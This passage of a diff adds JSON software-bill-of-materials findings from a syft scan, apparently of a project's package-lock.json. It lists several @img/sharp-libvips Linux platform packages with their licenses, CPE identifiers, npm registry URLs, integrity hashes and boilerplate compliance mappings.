+ "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-arm/-/sharp-libvips-linux-arm-1.2.4.tgz", + "integrity": "sha512-bFI7xcKFELdiNCVov8e44Ia4u2byA+l3XtsAj+Q8tfCwO6BQ8iDojYdvoPMqsKDkuoOo+X6HZA0s0q11ANMQ8A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "24ce05de10ecc79e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-libvips-linux-arm64 1.2.4", + "title": "@img/sharp-libvips-linux-arm64 1.2.4", + "description": "Package discovered: @img/sharp-libvips-linux-arm64 1.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b77c206e5d189694", + "name": "@img/sharp-libvips-linux-arm64", + "version": "1.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "LGPL-3.0-or-later", + "spdxExpression": "LGPL-3.0-or-later", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-arm64:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-arm64:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_arm64:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_arm64:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-libvips-linux-arm64@1.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-arm64/-/sharp-libvips-linux-arm64-1.2.4.tgz", + "integrity": "sha512-excjX8DfsIcJ10x1Kzr4RcWe1edC9PquDRRPx3YVCvQv+U5p7Yin2s32ftzikXojb1PIFc/9Mt28/y+iRklkrw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "042fdfd641843c8d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-libvips-linux-ppc64 1.2.4", + "title": "@img/sharp-libvips-linux-ppc64 1.2.4", + "description": "Package discovered: @img/sharp-libvips-linux-ppc64 1.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0a49b35ad8071788", + "name": "@img/sharp-libvips-linux-ppc64", + "version": "1.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "LGPL-3.0-or-later", + "spdxExpression": "LGPL-3.0-or-later", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-ppc64:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-ppc64:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_ppc64:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_ppc64:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-libvips-linux-ppc64@1.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-ppc64/-/sharp-libvips-linux-ppc64-1.2.4.tgz", + "integrity": "sha512-FMuvGijLDYG6lW+b/UvyilUWu5Ayu+3r2d1S8notiGCIyYU/76eig1UfMmkZ7vwgOrzKzlQbFSuQfgm7GYUPpA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2eef65dffbde81a3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-libvips-linux-riscv64 1.2.4", + "title": "@img/sharp-libvips-linux-riscv64 1.2.4", + "description": "Package discovered: @img/sharp-libvips-linux-riscv64 1.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "69aa9726ceb1125a", + "name": "@img/sharp-libvips-linux-riscv64", + "version": "1.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "LGPL-3.0-or-later", + "spdxExpression": "LGPL-3.0-or-later", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-riscv64:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-riscv64:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_riscv64:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_riscv64:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-libvips-linux-riscv64@1.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-riscv64/-/sharp-libvips-linux-riscv64-1.2.4.tgz", + "integrity": "sha512-oVDbcR4zUC0ce82teubSm+x6ETixtKZBh/qbREIOcI3cULzDyb18Sr/Wcyx7NRQeQzOiHTNbZFF1UwPS2scyGA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "48c4bc7216358207", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-libvips-linux-s390x 1.2.4", + "title": "@img/sharp-libvips-linux-s390x 1.2.4", + "description": "Package discovered: @img/sharp-libvips-linux-s390x 1.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b12e72c485584ae0", + "name": "@img/sharp-libvips-linux-s390x", + "version": "1.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "LGPL-3.0-or-later", + "spdxExpression": "LGPL-3.0-or-later", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-s390x:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-s390x:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_s390x:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_s390x:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-libvips-linux-s390x@1.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-s390x/-/sharp-libvips-linux-s390x-1.2.4.tgz", + "integrity": "sha512-qmp9VrzgPgMoGZyPvrQHqk02uyjA0/QrTO26Tqk6l4ZV0MPWIW6LTkqOIov+J1yEu7MbFQaDpwdwJKhbJvuRxQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "79972044480a2381", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-libvips-linux-x64 1.2.4", + "title": "@img/sharp-libvips-linux-x64 1.2.4", + "description": "Package discovered: @img/sharp-libvips-linux-x64 1.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a57b531e02329e6d", + "name": "@img/sharp-libvips-linux-x64", + "version": "1.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "LGPL-3.0-or-later", + "spdxExpression": "LGPL-3.0-or-later", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-x64:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-x64:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_x64:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_x64:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-libvips-linux-x64@1.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-x64/-/sharp-libvips-linux-x64-1.2.4.tgz", + "integrity": "sha512-tJxiiLsmHc9Ax1bz3oaOYBURTXGIRDODBqhveVHonrHJ9/+k89qbLl0bcJns+e4t4rvaNBxaEZsFtSfAdquPrw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", 